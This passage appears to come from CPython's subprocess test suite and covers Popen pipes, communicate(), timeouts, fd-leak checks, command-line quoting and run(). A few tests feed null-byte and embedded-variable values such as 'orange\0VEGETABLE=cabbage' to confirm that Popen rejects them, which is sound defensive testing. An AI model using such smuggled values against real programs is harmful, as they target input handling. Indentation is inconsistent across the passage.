p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
    """list2cmdline() quotes and escapes per the MS C runtime rules."""
    # Argument containing spaces is double-quoted.
    self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
                     '"a b c" d e')
    # Embedded double quotes are backslash-escaped.
    self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
                     'ab\\"c \\ d')
    self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
                     'ab\\"c " \\\\" d')
    # Backslashes are doubled only when they precede a quote.
    self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
                     'a\\\\\\b "de fg" h')
    self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
                     'a\\\\\\"b c d')
    self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
                     '"a\\\\b c" d e')
    self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
                     '"a\\\\b\\ c" d e')
    # An empty argument is rendered as an empty quoted string.
    self.assertEqual(subprocess.list2cmdline(['ab', '']),
                     'ab ""')
def test_poll(self):
    """poll() is None while the child runs, the exit status afterwards."""
    p = subprocess.Popen([sys.executable, "-c",
                          "import os; os.read(0, 1)"],
                         stdin=subprocess.PIPE)
    self.addCleanup(p.stdin.close)
    self.assertIsNone(p.poll())
    # Unblock the child's os.read() so it can exit.
    os.write(p.stdin.fileno(), b'A')
    p.wait()
    # Subsequent invocations should just return the returncode
    self.assertEqual(p.poll(), 0)
def test_wait(self):
    """wait() returns the exit status, also on repeated invocations."""
    child = subprocess.Popen(ZERO_RETURN_CMD)
    self.assertEqual(child.wait(), 0)
    # Calling wait() again after exit just re-reports the returncode.
    self.assertEqual(child.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
    def _test_bufsize_equal_one(self, line, expected, universal_newlines):
        """Write *line* to a bufsize=1 child and expect *expected* on stdout.

        Helper for the two bufsize_equal_one tests below.  The parent-side
        stdin fd is closed WITHOUT flushing the buffered writer, so only
        data already flushed (line-buffered text mode) reaches the child.
        """
        # subprocess may deadlock with bufsize=1, see issue #21332
        with subprocess.Popen([sys.executable, "-c", "import sys;"
                               "sys.stdout.write(sys.stdin.readline());"
                               "sys.stdout.flush()"],
                              stdin=subprocess.PIPE,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL,
                              bufsize=1,
                              universal_newlines=universal_newlines) as p:
            p.stdin.write(line)  # expect that it flushes the line in text mode
            os.close(p.stdin.fileno())  # close it without flushing the buffer
            read_line = p.stdout.readline()
            # Closing the buffered wrapper may raise because the raw fd is
            # already gone; suppress that (and any crash report) deliberately.
            with support.SuppressCrashReport():
                try:
                    p.stdin.close()
                except OSError:
                    pass
            p.stdin = None
        self.assertEqual(p.returncode, 0)
        self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
    def test_nonexisting_with_pipes(self):
        """Spawning a nonexistent command with pipes must close them cleanly."""
        # bpo-30121: Popen with pipes must close properly pipes on error.
        # Previously, os.close() was called with a Windows handle which is not
        # a valid file descriptor.
        #
        # Run the test in a subprocess to control how the CRT reports errors
        # and to get stderr content.
        try:
            import msvcrt
            msvcrt.CrtSetReportMode
        except (AttributeError, ImportError):
            self.skipTest("need msvcrt.CrtSetReportMode")
        code = textwrap.dedent(f"""
            import msvcrt
            import subprocess
            cmd = {NONEXISTING_CMD!r}
            for report_type in [msvcrt.CRT_WARN,
                                msvcrt.CRT_ERROR,
                                msvcrt.CRT_ASSERT]:
                msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
                msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
            try:
                subprocess.Popen(cmd,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            except OSError:
                pass
        """)
        cmd = [sys.executable, "-c", code]
        proc = subprocess.Popen(cmd,
                                stderr=subprocess.PIPE,
                                universal_newlines=True)
        with proc:
            stderr = proc.communicate()[1]
        # No CRT diagnostics may leak to stderr and the child must exit 0.
        self.assertEqual(stderr, "")
        self.assertEqual(proc.returncode, 0)
    def test_double_close_on_error(self):
        """Popen error paths must not close the same fd twice (issue #18851).

        A background thread keeps opening pipes while Popen fails; if the
        failing Popen double-closed one of its fds, it could accidentally
        close a pipe fd opened by the thread, and the final os.close() sweep
        below would then raise.
        """
        fds = []
        def open_fds():
            # Racing fd creation: makes a double close in Popen likely to
            # hit one of these descriptors.
            for i in range(20):
                fds.extend(os.pipe())
                time.sleep(0.001)
        t = threading.Thread(target=open_fds)
        t.start()
        try:
            with self.assertRaises(EnvironmentError):
                subprocess.Popen(NONEXISTING_CMD,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        finally:
            t.join()
            exc = None
            for fd in fds:
                # If a double close occurred, some of those fds will
                # already have been closed by mistake, and os.close()
                # here will raise.
                try:
                    os.close(fd)
                except OSError as e:
                    exc = e
            if exc is not None:
                raise exc
    def test_threadsafe_wait(self):
        """Issue21291: Popen.wait() needs to be threadsafe for returncode."""
        proc = subprocess.Popen([sys.executable, '-c',
                                 'import time; time.sleep(12)'])
        self.assertEqual(proc.returncode, None)
        # Observations recorded by the timer thread, compared at the end.
        results = []
        def kill_proc_timer_thread():
            results.append(('thread-start-poll-result', proc.poll()))
            # terminate it from the thread and wait for the result.
            proc.kill()
            proc.wait()
            results.append(('thread-after-kill-and-wait', proc.returncode))
            # this wait should be a no-op given the above.
            proc.wait()
            results.append(('thread-after-second-wait', proc.returncode))
        # This is a timing sensitive test, the failure mode is
        # triggered when both the main thread and this thread are in
        # the wait() call at once.  The delay here is to allow the
        # main thread to most likely be blocked in its wait() call.
        t = threading.Timer(0.2, kill_proc_timer_thread)
        t.start()
        if mswindows:
            expected_errorcode = 1
        else:
            # Should be -9 because of the proc.kill() from the thread.
            expected_errorcode = -9
        # Wait for the process to finish; the thread should kill it
        # long before it finishes on its own.  Supplying a timeout
        # triggers a different code path for better coverage.
        proc.wait(timeout=support.SHORT_TIMEOUT)
        self.assertEqual(proc.returncode, expected_errorcode,
                         msg="unexpected result in wait from main thread")
        # This should be a no-op with no change in returncode.
        proc.wait()
        self.assertEqual(proc.returncode, expected_errorcode,
                         msg="unexpected result in second main wait.")
        t.join()
        # Ensure that all of the thread results are as expected.
        # When a race condition occurs in wait(), the returncode could
        # be set by the wrong thread that doesn't actually have it
        # leading to an incorrect value.
        self.assertEqual([('thread-start-poll-result', None),
                          ('thread-after-kill-and-wait', expected_errorcode),
                          ('thread-after-second-wait', expected_errorcode)],
                         results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
    def test_repr(self):
        """repr(Popen) reports the returncode while running and after exit."""
        # Run a command that waits for user input, to check the repr() of
        # a Proc object while and after the sub-process runs.
        code = 'import sys; input(); sys.exit(57)'
        cmd = [sys.executable, '-c', code]
        # Expected repr() prefix; the returncode is interpolated below.
        result = "<Popen: returncode: {}"
        with subprocess.Popen(
                cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
            # While running: returncode is None and repr reflects that.
            self.assertIsNone(proc.returncode)
            self.assertTrue(
                repr(proc).startswith(result.format(proc.returncode)) and
                repr(proc).endswith('>')
            )
            proc.communicate(input='exit...\n')
            proc.wait()
            # After exit: repr must show the real (non-None) returncode.
            self.assertIsNotNone(proc.returncode)
            self.assertTrue(
                repr(proc).startswith(result.format(proc.returncode)) and
                repr(proc).endswith('>')
            )
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
                         "Requires signal.SIGUSR1")
    @unittest.skipUnless(hasattr(os, 'kill'),
                         "Requires os.kill")
    @unittest.skipUnless(hasattr(os, 'getppid'),
                         "Requires os.getppid")
    def test_communicate_eintr(self):
        """communicate() must survive being interrupted by a signal."""
        # Issue #12493: communicate() should handle EINTR
        def handler(signum, frame):
            # A no-op handler is enough: delivery alone interrupts syscalls.
            pass
        old_handler = signal.signal(signal.SIGUSR1, handler)
        self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
        # The child signals its parent (this process) and exits.
        args = [sys.executable, "-c",
                'import os, signal;'
                'os.kill(os.getppid(), signal.SIGUSR1)']
        for stream in ('stdout', 'stderr'):
            kw = {stream: subprocess.PIPE}
            with subprocess.Popen(args, **kw) as process:
                # communicate() will be interrupted by SIGUSR1
                process.communicate()
    # This test is Linux-ish specific for simplicity to at least have
    # some coverage.  It is not a platform specific bug.
    @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
                         "Linux specific")
    def test_failed_child_execute_fd_leak(self):
        """Test for the fork() failure fd leak reported in issue16327."""
        fd_directory = '/proc/%d/fd' % os.getpid()
        fds_before_popen = os.listdir(fd_directory)
        # PopenExecuteChildRaises fails inside _execute_child; every pipe fd
        # created for stdin/stdout/stderr must be cleaned up on that path.
        with self.assertRaises(PopenTestException):
            PopenExecuteChildRaises(
                    ZERO_RETURN_CMD, stdin=subprocess.PIPE,
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # NOTE: This test doesn't verify that the real _execute_child
        # does not close the file descriptors itself on the way out
        # during an exception.  Code inspection has confirmed that.
        fds_after_exception = os.listdir(fd_directory)
        self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
    """Tests for the subprocess.run() convenience wrapper.

    Fix: removed the dead ``output =`` / ``cp =`` bindings inside
    ``assertRaises`` blocks — run() raises before returning there, so the
    assignments could never complete and only shadowed intent.
    """
    def run_python(self, code, **kwargs):
        """Run Python code in a subprocess using subprocess.run"""
        argv = [sys.executable, "-c", code]
        return subprocess.run(argv, **kwargs)
    def test_returncode(self):
        # call() function with sequence argument
        cp = self.run_python("import sys; sys.exit(47)")
        self.assertEqual(cp.returncode, 47)
        with self.assertRaises(subprocess.CalledProcessError):
            cp.check_returncode()
    def test_check(self):
        with self.assertRaises(subprocess.CalledProcessError) as c:
            self.run_python("import sys; sys.exit(47)", check=True)
        self.assertEqual(c.exception.returncode, 47)
    def test_check_zero(self):
        # check_returncode shouldn't raise when returncode is zero
        cp = subprocess.run(ZERO_RETURN_CMD, check=True)
        self.assertEqual(cp.returncode, 0)
    def test_timeout(self):
        # run() function with timeout argument; we want to test that the child
        # process gets killed when the timeout expires.  If the child isn't
        # killed, this call will deadlock since subprocess.run waits for the
        # child.
        with self.assertRaises(subprocess.TimeoutExpired):
            self.run_python("while True: pass", timeout=0.0001)
    def test_capture_stdout(self):
        # capture stdout with zero return code
        cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
        self.assertIn(b'BDFL', cp.stdout)
    def test_capture_stderr(self):
        cp = self.run_python("import sys; sys.stderr.write('BDFL')",
                             stderr=subprocess.PIPE)
        self.assertIn(b'BDFL', cp.stderr)
    def test_check_output_stdin_arg(self):
        # run() can be called with stdin set to a file
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        cp = self.run_python(
                 "import sys; sys.stdout.write(sys.stdin.read().upper())",
                 stdin=tf, stdout=subprocess.PIPE)
        self.assertIn(b'PEAR', cp.stdout)
    def test_check_output_input_arg(self):
        # check_output() can be called with input set to a string
        cp = self.run_python(
                 "import sys; sys.stdout.write(sys.stdin.read().upper())",
                 input=b'pear', stdout=subprocess.PIPE)
        self.assertIn(b'PEAR', cp.stdout)
    def test_check_output_stdin_with_input_arg(self):
        # run() refuses to accept 'stdin' with 'input'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b'pear')
        tf.seek(0)
        with self.assertRaises(ValueError,
              msg="Expected ValueError when stdin and input args supplied.") as c:
            self.run_python("print('will not be run')",
                            stdin=tf, input=b'hare')
        self.assertIn('stdin', c.exception.args[0])
        self.assertIn('input', c.exception.args[0])
    def test_check_output_timeout(self):
        with self.assertRaises(subprocess.TimeoutExpired) as c:
            self.run_python((
                     "import sys, time\n"
                     "sys.stdout.write('BDFL')\n"
                     "sys.stdout.flush()\n"
                     "time.sleep(3600)"),
                    # Some heavily loaded buildbots (sparc Debian 3.x) require
                    # this much time to start and print.
                    timeout=3, stdout=subprocess.PIPE)
        self.assertEqual(c.exception.output, b'BDFL')
